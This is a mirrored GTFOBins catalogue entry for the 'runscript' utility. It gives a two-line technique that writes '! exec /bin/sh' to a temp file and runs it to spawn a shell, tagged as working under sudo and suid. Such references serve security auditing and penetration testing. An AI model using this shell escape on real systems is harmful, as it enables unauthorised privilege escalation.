1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2026-03-07 14:36:23 +01:00
GTFOBins.github.io/_gtfobins/runscript
2026-01-07 21:59:13 +01:00

13 lines
202 B
Plaintext

---
functions:
shell:
- code: |-
echo '! exec /bin/sh' >/path/to/temp-file
runscript /path/to/temp-file
contexts:
sudo:
suid:
shell: true
unprivileged:
...